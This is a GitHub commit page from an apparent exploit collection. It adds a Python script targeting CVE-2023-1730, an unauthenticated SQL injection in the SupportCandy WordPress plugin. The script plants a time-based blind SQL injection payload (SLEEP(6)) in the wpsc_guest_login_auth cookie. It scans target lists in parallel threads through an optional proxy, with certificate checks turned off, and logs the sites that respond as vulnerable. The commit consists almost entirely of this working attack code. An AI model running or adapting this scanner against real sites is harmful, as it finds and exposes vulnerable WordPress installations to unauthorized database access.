Skip to content

Commit e6912ac

Browse files
authored
WordPress plugin SupportCandy SQL注入漏洞CVE-2023-1730
3.1.5之前的SupportCandy WordPress插件在SQL语句中使用用户输入之前不会验证和转义用户输入,这可能允许未经身份验证的攻击者执行SQL注入攻击。
1 parent a07966c commit e6912ac

File tree

1 file changed

+76
-0
lines changed

1 file changed

+76
-0
lines changed
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,76 @@
1+
# 作者: VulnExpo
2+
# 日期: 2023-11-16
3+
4+
import requests
5+
import argparse
6+
import threading
7+
import time
8+
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
9+
10+
def check_for_vulnerability(url, proxies=None, success_file=None):
11+
try:
12+
headers = {'Cookie': 'wpsc_guest_login_auth={"email":"\' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"}'}
13+
14+
# 检查响应时间
15+
start_time = time.time()
16+
response = requests.get(url, headers=headers, proxies=proxies, verify=False)
17+
end_time = time.time()
18+
duration = end_time - start_time
19+
20+
if response.status_code == 200 and "supportcandy" in response.text and duration >= 6:
21+
print(f"目标URL: {url}")
22+
with open(success_file, 'a') as s_file:
23+
s_file.write(f"++++++++++++++++++\n")
24+
s_file.write(f"目标URL: {url}\n")
25+
s_file.write(f"响应内容: 响应时间:{duration}\n\n")
26+
return True
27+
except Exception as e:
28+
print(f"发生异常:{e}")
29+
return False
30+
31+
def scan_targets(targets, proxies=None, success_file=None):
32+
for target in targets:
33+
target = target.strip()
34+
check_for_vulnerability(target, proxies, success_file)
35+
36+
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
37+
threads = []
38+
39+
for i in range(num_threads):
40+
thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
41+
threads.append(thread)
42+
43+
for thread in threads:
44+
thread.start()
45+
46+
for thread in threads:
47+
thread.join()
48+
49+
if __name__ == '__main__':
50+
parser = argparse.ArgumentParser(description="WordPress plugin SupportCandy SQL注入漏洞CVE-2023-1730")
51+
parser.add_argument("-u", "--url", help="目标URL")
52+
parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
53+
parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
54+
parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
55+
args = parser.parse_args()
56+
57+
if not args.url and not args.file:
58+
print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
59+
exit(1)
60+
61+
if args.url:
62+
urls = [args.url]
63+
elif args.file:
64+
with open(args.file, 'r') as file:
65+
urls = file.readlines()
66+
67+
success_file = 'success_targets.txt'
68+
69+
proxies = {
70+
"http": args.proxy,
71+
"https": args.proxy
72+
} if args.proxy else None
73+
74+
multi_threaded_scan(urls, proxies, success_file, args.threads)
75+
76+
print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")

0 commit comments

Comments
 (0)